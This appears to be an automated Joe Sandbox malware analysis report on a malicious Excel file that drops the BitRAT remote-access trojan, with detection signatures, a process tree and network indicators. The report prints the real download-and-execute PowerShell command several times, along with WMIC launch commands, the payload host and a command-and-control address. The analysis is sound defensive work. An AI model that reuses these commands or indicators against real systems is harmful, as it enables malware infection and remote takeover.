Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Scanned_25526662-Payment.xls

Overview

General Information

Sample Name:Scanned_25526662-Payment.xls
Analysis ID:337288
MD5:cd7d4543958945e3fab4f0631e3494f3
SHA1:3e00f26ab9384c9c1bb24eeb2de331f751f536ed
SHA256:b7a919bb30c1633483399356aedf42c11656c8a076be969e85b57ccdd071b879
Tags:BitRATRATStratoxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 BitRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected BitRAT
Contains functionality to create processes via WMI
Contains functionality to hide a thread from the debugger
Creates processes via WMI
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Hides threads from debuggers
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6560 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 6884 cmdline: cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )) MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6940 cmdline: PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )) MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • csc.exe (PID: 3868 cmdline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline' MD5: 350C52F71BDED7B99668585C15D70EEA)
          • cvtres.exe (PID: 3596 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP' MD5: C09985AE74F0882F208D75DE27770DFA)
        • cmd.exe (PID: 3144 cmdline: 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • cmd.exe (PID: 6588 cmdline: 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • WMIC.exe (PID: 1636 cmdline: WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
  • Test3.jpg (PID: 4928 cmdline: C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: 19387B30D6DBE83E31D3CAC884280D93)
    • Test3.jpg (PID: 3180 cmdline: C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: 19387B30D6DBE83E31D3CAC884280D93)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Scanned_25526662-Payment.xlsPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x1d3ef:$s1: PoWErsHEll
Scanned_25526662-Payment.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\1BA10000PowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x1cc71:$s1: PoWErsHEll

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: Test3.jpg PID: 3180JoeSecurity_BitRATYara detected BitRATJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6940, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline', ProcessId: 3868
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )), CommandLine: cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6560, ProcessCommandLine: cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )), ProcessId: 6884
      Sigma detected: Suspicious Csc.exe Source File FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6940, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline', ProcessId: 3868

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgAvira: detection malicious, Label: TR/Dropper.Gen
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\Test1.txtReversingLabs: Detection: 36%
      Multi AV Scanner detection for submitted fileShow sources
      Source: Scanned_25526662-Payment.xlsVirustotal: Detection: 14%Perma Link
      Source: Scanned_25526662-Payment.xlsReversingLabs: Detection: 15%
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\Test1.txtJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00426ED0 __vbaAryLock,__vbaAryUnlock,#644,#644,__vbaStrCat,__vbaStrMove,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr,27_2_00426ED0
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00426B80 __vbaAryLock,__vbaAryUnlock,__vbaAryLock,__vbaStrVarCopy,__vbaStrMove,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarMove,__vbaVarMove,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaLenBstrB,CryptHashData,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarZero,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaAryLock,__vbaAryLock,CryptDecrypt,__vbaAryUnlock,__vbaRedimPreserve,__vbaFreeStr,27_2_00426B80
      Source: Test3.jpg, 0000001B.00000002.361415384.00000000030E0000.00000040.00000001.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError,29_2_00426F7A

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
      Source: global trafficDNS query: name: lankarecipes.com
      Source: global trafficTCP traffic: 192.168.2.3:49731 -> 192.185.236.165:80
      Source: global trafficTCP traffic: 192.168.2.3:49731 -> 192.185.236.165:80
      Source: global trafficTCP traffic: 192.168.2.3:49734 -> 45.15.143.216:5210
      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
      Source: global trafficHTTP traffic detected: GET /Sparc.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: lankarecipes.comConnection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00415B0A WSARecv,29_2_00415B0A
      Source: global trafficHTTP traffic detected: GET /Sparc.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: lankarecipes.comConnection: Keep-Alive
      Source: unknownDNS traffic detected: queries for: lankarecipes.com
      Source: PowerShell_transcript.648351.+jaH7BR7.20210108094000.txt.3.drString found in binary or memory: http://lankarecipes.com/Sparc.jp
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.aadrm.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.cortana.ai
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.office.net
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.onedrive.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://augloop.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cdn.entity.
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://clients.config.office.net/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://config.edge.skype.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cortana.ai
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cortana.ai/api
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cr.office.com
      Source: Test3.jpg, Test3.jpg, 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dev.cortana.ai
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://devnull.onenote.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://directory.services.
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://graph.windows.net
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://graph.windows.net/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://lifecycle.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://login.windows.local
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://management.azure.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://management.azure.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://messaging.office.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://ncus-000.contentsync.
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://officeapps.live.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
